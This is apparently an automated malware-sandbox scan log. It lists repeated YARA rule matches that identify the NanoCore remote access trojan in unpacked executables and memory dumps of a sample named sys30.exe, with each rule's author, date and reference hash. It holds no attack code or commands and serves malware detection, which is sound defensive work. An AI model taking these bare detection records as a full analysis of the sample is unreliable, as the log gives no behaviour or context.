Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.26ee188.22.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.740000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
